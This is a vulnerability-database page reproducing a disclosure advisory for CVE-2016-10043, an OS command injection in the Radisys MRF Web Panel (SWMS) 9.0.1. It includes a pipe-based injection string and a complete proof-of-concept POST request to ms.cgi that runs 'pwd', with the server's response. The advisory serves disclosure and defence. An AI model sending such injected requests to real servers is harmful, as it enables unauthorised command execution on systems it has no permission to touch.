Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtFilippos Mastrogiannis1337DAY-ID-26831
HistoryJan 27, 2017 - 12:00 a.m.

Radisys MRF - Command Injection Vulnerability

2017-01-2700:00:00
Filippos Mastrogiannis
0day.today
33

0.032 Low

EPSS

Percentile

91.2%

JSON

Exploit for cgi platform in category web applications

Title:      MRF Web Panel OS Command Injection
Vendor:     Radisys
Vendor Homepage: http://www.radisys.com
Product:    MRF Web Panel (SWMS)
Version:    9.0.1
CVE:        CVE-2016-10043
CWE:        CWE-78
Risk Level: High
 
Discovery:  Filippos Mastrogiannis, Loukas Alkis & Dimitrios Maragkos
            COSMOTE (OTE Group) Information & Network Security
 
-----------------------------------------------------------------------------------------
 
 
Vulnerability Details:
 
The MRF Web Panel (SWMS) is vulnerable to OS Command Injection
attacks.
 
> Affected parameter: MSM_MACRO_NAME (POST parameter)
> Affected file: ms.cgi (/swms/ms.cgi)
> Verified Affected Operation: Show Fatal Error and Log Package Configuration
 
It is possible to use the pipe character (|) to inject arbitrary OS commands
and retrieve the output in the application's responses:
 
MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a #' |<command>||a #|" |||a #
 
 
Proof Of Concept:
 
1. Login to the vulnerable MRF web panel (with a standard user account): 
   https://<vulnerable>/swms
2. Fire up your favorite intercepting proxy tool (Burp Suite, OWASP ZAP etc)
3. Modify and send the following POST request:
 
POST /swms/ms.cgi HTTP/1.1
Host: <vulnerable>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://<vulnerable>/swms/ms.cgi?MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-GETFIRSTINPUT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213
 
MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a%20%23'%20|pwd||a%20%23|"%20|||a%20%23&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-EXECUTE&Btn_Execute=Execute
 
4. Check the output of the injected command 'pwd' in the response:
 
HTTP/1.1 200 OK
Date: Thu, 21 Jul 2016 08:18:43 GMT
Server: Apache
Cache-Control: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23
 
/var/opt/swms/www/html
 
 
Vulnerability Impact:
 
Application's own data and functionality or the web server can be compromised due
to OS command injection vulnerabilities. It may also be possible to use the server
as a platform for attacks against other systems.
 
 
Disclaimer:
 
The responsible disclosure policy has been followed

#  0day.today [2018-03-31]  #

Related

prion 1
cve 1
exploitpack 1
cvelist 1
nvd 1
packetstorm 1
exploitdb 1
prion
prion
Command injection
2017-01-31 18:59:00
cve
cve
CVE-2016-10043
2017-01-31 18:59:00
exploitpack
exploitpack
Radisys MRF - Command Injection
2017-01-27 00:00:00
cvelist
cvelist
CVE-2016-10043
2017-01-31 18:00:00
nvd
nvd
CVE-2016-10043
2017-01-31 18:59:00
packetstorm
packetstorm
MRF Web Panel 9.0.1 OS Command Injection
2017-01-28 00:00:00
exploitdb
exploitdb
Radisys MRF - Command Injection
2017-01-27 00:00:00

0.032 Low

EPSS

Percentile

91.2%

JSON
Related for 1337DAY-ID-26831
prion1cve1exploitpack1cvelist1nvd1packetstorm1exploitdb1